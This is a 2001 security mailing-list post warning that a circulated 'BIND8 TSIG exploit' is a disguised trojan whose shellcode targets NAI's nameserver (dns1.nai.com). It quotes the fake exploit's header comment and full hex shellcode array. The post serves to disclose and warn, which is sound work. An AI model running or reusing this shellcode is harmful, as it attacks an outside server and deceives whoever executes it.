That BIND8 "exploit" attacks NAI

[Max Vision <vision () WHITEHATS COM>]

Hi,

Please beware of running code such as this.  It will do it's best to attack
NAI's nameserver.  It's a typical, though well disguised, shellcode trick.
Look in the Linux shellcode:
\xa1\x45\x03\x96  ==  161.69.3.150 == dns1.nai.com

More details after I have a better look...
Max

At 04:12 PM 1/31/2001 -0700, you wrote:
> >From Anonymous <nobody () replay com> Wed Jan 31 18:06:24 2001
> Date: Thu, 31 Jan 2001 18:06:19 -0400
> From: Anonymous <nobody () replay com>
> To: BUGTRAQ () SECURITYFOCUS COM
> Subject: Bind8 exploit
> Message-ID: <C5119AD12E92D311928E009027DE4CCA554903 () replay com>
> Mime-Version: 1.0
> Content-Type: text/plain; charset="us-ascii"
> X-Mailer: Internet Mail Service (5.5.2650.21)
>
>
> /*
>  * Implements TSIG buffer mismanagement overflow for incorrect
> signatures. That
>  * one was really nice bug!
>  * Thanks NAI for nice bug!
>  */
>
> /* zeroes in all shellcodes are allowed - we encode them anyway.. */
> char            linux_shellcode[] =     /* modifyed Aleph1 linux shellcode to
>                                         * bind to tcp port 31338. hey aleph1
>                                         * :) */
> "\xeb\x34\x5e\xbb\x01\x00\x00\x00\x89\xf1\xb8\x66\x00\x00\x00\xcd"
> "\x80\x89\x46\x14\x8d\x46\x30\x89\x46\x18\x31\xc0\x89\x46\x20\x8d"
> "\x46\x0c\x89\x46\x24\xb8\x66\x00\x00\x00\xbb\x0b\x00\x00\x00\x8d"
> "\x4e\x14\xcd\x80\xeb\xef\xe8\xc7\xff\xff\xff\x02\x00\x00\x00\x02"
> "\x00\x00\x00\x11\x00\x00\x00\x02\x00\x00\x35\xa1\x45\x03\x96\xff"
> "\xff\xff\xff\xef\xff\xff\xff\x00\x04\x00\x00\x00\x00\x00\x00\x02"
> "\x5f\x9a\x80\x10\x00\x00\x00/bin/sh\0";